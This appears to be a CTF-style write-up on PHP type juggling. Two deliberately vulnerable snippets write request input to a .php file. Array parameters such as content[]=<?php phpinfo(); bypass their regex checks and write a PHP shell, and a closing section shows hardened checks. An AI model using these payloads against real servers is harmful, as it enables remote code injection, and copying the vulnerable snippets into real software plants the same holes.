```php
<?php
function is_valid($title, $data)
{
    $data = $title . $data;
    return preg_match('|\A[ _a-zA-Z0-9]+\z|is', $data);
}
function write_cache($title, $content)
{
    if (!is_valid($title, $content)) {
        exit("title or content error");
    }
    $filename = "1.php";
    file_put_contents($filename, $content);
}
$title = $_GET['title'];
$content = $_GET['content'];
write_cache($title, $content);
```
The main problem lies in:

```php
function is_valid($title, $data)
{
    $data = $title . $data;
    return preg_match('|\A[ _a-zA-Z0-9]+\z|is', $data);
}
```
namely the weak typing problem in the validation function. If normal parameters are passed in, there is obviously no problem, but if we pass in an array instead, payload:

http://localhost/web/trick1/index.php?title=sky&content[]=<?php%20phpinfo();
可以清楚看见
H:\wamp64\www\web\trick1\index.php:5:string 'skyArray' (length=8)
H:\wamp64\www\web\trick1\index.php:16:
array (size=1)
0 => string '<?php phpinfo();,123' (length=20)
At this point the array, when passed into the validation function, becomes the string "Array", which bypasses the check perfectly. Now look at another challenge:

```php
<?php
$text = $_GET['text'];
if (preg_match('[<>?]', $text)) {
    die('error!');
}
file_put_contents('config.php', $text);
```
Now we pass in the payload:

http://localhost/web/trick1/index.php?text=%3C?php%20phpinfo();

which returns:

error!
Clearly our shell was blocked by the WAF, but if we use this weak comparison trick:

http://localhost/web/trick1/index.php?text[]=%3C?php%20phpinfo();

the shell is written successfully.
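As an added example (not part of the original writeup), here is how both checks look once they refuse anything that is not a string and treat a `preg_match()` error as a failed check, so an array parameter can neither degrade to "Array" nor make the regex call return `false`. The function names and the sample inputs are constructed for this illustration.

```php
<?php
// Added example, not from the original writeup: hardened versions of the
// two checks. Both reject non-string input before the regex runs and only
// accept an explicit preg_match() result (1 = match, 0 = no match, false = error).

function is_valid_strict($title, $data): bool
{
    // $_GET['content'][] arrives as an array; it must never reach the regex.
    if (!is_string($title) || !is_string($data)) {
        return false;
    }
    $data = $title . $data;
    return preg_match('|\A[ _a-zA-Z0-9]+\z|is', $data) === 1;
}

function text_is_safe($text): bool
{
    if (!is_string($text)) {
        return false;
    }
    // The writeup's '[<>?]' uses [ and ] as PCRE delimiters, so its pattern is
    // just '<>?'. A real character class needs its own delimiters, as here.
    // A result of false (error) is treated as unsafe, not as "no match".
    return preg_match('/[<>?]/', $text) === 0;
}

// Constructed inputs mirroring the writeup's two requests.
$cases = [
    ['sky', 'hello123'],             // ordinary string input
    ['sky', ['<?php phpinfo();']],   // array content, as sent via content[]
];
foreach ($cases as [$title, $content]) {
    var_dump(is_valid_strict($title, $content));
}
var_dump(text_is_safe('<?php phpinfo();'));    // string containing '<' and '?'
var_dump(text_is_safe(['<?php phpinfo();']));  // array, as sent via text[]
var_dump(text_is_safe('plain text'));
```

Note that on PHP 7 an array subject makes `preg_match()` emit a warning and return `false`, which is what the original `if (preg_match(...))` silently swallows; on PHP 8 the same call throws a `TypeError` instead, so the explicit `is_string()` check is what gives consistent behaviour across versions.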